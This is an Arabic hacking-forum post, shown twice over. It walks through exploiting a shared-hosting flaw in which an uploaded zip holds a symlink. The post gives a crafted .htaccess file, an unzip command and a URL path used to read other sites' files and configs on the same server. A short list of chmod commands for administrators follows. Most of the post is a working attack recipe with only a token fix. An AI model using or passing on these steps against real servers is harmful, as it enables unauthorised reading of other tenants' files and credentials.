loulou ange
11-02-2013, بتوقيت غرينيتش 01:27 AM
بـسم الله الرحمن الرحـيم ,
[+] يوم شفـت نفـسي فـآضي فـ قلت آشرح طريقة لكم ثغـٍره فـٍُك آلضغ‘ــط , وطـريقـة ترـقيعهآ ×
نبدأ على بركه الله ,
نشـرح الثغره ووظيفتهآ , عشـآن الكـل يفهم وش القصه ,
الثغره هـآإذي تمكنآ من قرائه ملفآت اي موقع على السيرفر SERVER منهآ الكونفج واي ملف أخر على السيرفر
أدوأت الثغره
ملف هيتكس موجود فيه , <
رمز PHP:
<code style="white-space:nowrap"> <code> #[D]eveloped l3y Me dont ask who im ...
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
</code> </code>
وملف ZiP عشآن يفك الضغط ويسحب بأسم 1.txt
نشوف الصور مع بعـض ,
انا سويت مـلف بأسم S!Lv3r.47
> الصور تتـكلم ×
http://store2.up-00.com/Nov10/f4397346.jpg
1=> الملفآت الي موجوده
2=> المسار الي أحنا عليه
الحينـ نطبق الامر ,
unzip Sec.zip
=> لي فك الضغط عن المـلف
نشــوف وش نتج لنـآ
تشـوفو نشأء لنآ اختصـآر 1.Txt
http://store2.up-00.com/Nov10/ymV97622.jpg
نروح للملف الي سوينآ فيهـ الاخصـآر
http:/xxxx.com/images/updates/S!Lv3r.47/
رآح نلآحظ ملف أسمه [ 1.txt ]
http://store2.up-00.com/Nov10/CLl98080.jpg
الحين ندخله ورآح نسوي كذا
http:/xxxx.com/images/updates/S!Lv3r.47/1.txt/home/user/public_html
الون الاحمر > يعني اليوزر الي نبي نشوف ملفآته .!
آنآ حطيت يوزر آحد موآقع السيرفر SERVER
تعـآلو نشوف ظهرت لنآ الملفآت ولالا ؟ .
http://store2.up-00.com/Nov10/xQw98080.gif
بـوـوـوـوم ظهرت لنآ .!
هذا شرح طريقة للثغره ولي شده خطورتهـآإ
نبدأ بطريقة الترقيع أتركهآ لي مدرآء السيرفر SERVER
رمز PHP:
<code style="white-space:nowrap"> <code> chmod 711 /bin/gzip
chmod 750 /usr/bin/gzip
chmod 750 /bin/gunzip
chmod 750 /usr/bin/gunzip
chmod 750 /bin/gtar
chmod 711 /usr/bin/unzip
chmod 711 /usr/bin/zip
chmod 700 /usr/bin/unrar
chmod 711 /usr/local/bandmin
</code> </code>
موفـقين ,
Se-http://www.dzbatna.com/images/mail.gifHotmail.Com & r00thttp://www.dzbatna.com/images/mail.gifSecurity
[-] العضـوية مستعـآره
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
[+] يوم شفـت نفـسي فـآضي فـ قلت آشرح طريقة لكم ثغـٍره فـٍُك آلضغ‘ــط , وطـريقـة ترـقيعهآ ×
نبدأ على بركه الله ,
نشـرح الثغره ووظيفتهآ , عشـآن الكـل يفهم وش القصه ,
الثغره هـآإذي تمكنآ من قرائه ملفآت اي موقع على السيرفر SERVER منهآ الكونفج واي ملف أخر على السيرفر
أدوأت الثغره
ملف هيتكس موجود فيه , <
رمز PHP:
<code style="white-space:nowrap"> <code> #[D]eveloped l3y Me dont ask who im ...
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
</code> </code>
وملف ZiP عشآن يفك الضغط ويسحب بأسم 1.txt
نشوف الصور مع بعـض ,
انا سويت مـلف بأسم S!Lv3r.47
> الصور تتـكلم ×
http://store2.up-00.com/Nov10/f4397346.jpg
1=> الملفآت الي موجوده
2=> المسار الي أحنا عليه
الحينـ نطبق الامر ,
unzip Sec.zip
=> لي فك الضغط عن المـلف
نشــوف وش نتج لنـآ
تشـوفو نشأء لنآ اختصـآر 1.Txt
http://store2.up-00.com/Nov10/ymV97622.jpg
نروح للملف الي سوينآ فيهـ الاخصـآر
http:/xxxx.com/images/updates/S!Lv3r.47/
رآح نلآحظ ملف أسمه [ 1.txt ]
http://store2.up-00.com/Nov10/CLl98080.jpg
الحين ندخله ورآح نسوي كذا
http:/xxxx.com/images/updates/S!Lv3r.47/1.txt/home/user/public_html
الون الاحمر > يعني اليوزر الي نبي نشوف ملفآته .!
آنآ حطيت يوزر آحد موآقع السيرفر SERVER
تعـآلو نشوف ظهرت لنآ الملفآت ولالا ؟ .
http://store2.up-00.com/Nov10/xQw98080.gif
بـوـوـوـوم ظهرت لنآ .!
هذا شرح طريقة للثغره ولي شده خطورتهـآإ
نبدأ بطريقة الترقيع أتركهآ لي مدرآء السيرفر SERVER
رمز PHP:
<code style="white-space:nowrap"> <code> chmod 711 /bin/gzip
chmod 750 /usr/bin/gzip
chmod 750 /bin/gunzip
chmod 750 /usr/bin/gunzip
chmod 750 /bin/gtar
chmod 711 /usr/bin/unzip
chmod 711 /usr/bin/zip
chmod 700 /usr/bin/unrar
chmod 711 /usr/local/bandmin
</code> </code>
موفـقين ,
Se-http://www.dzbatna.com/images/mail.gifHotmail.Com & r00thttp://www.dzbatna.com/images/mail.gifSecurity
[-] العضـوية مستعـآره
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©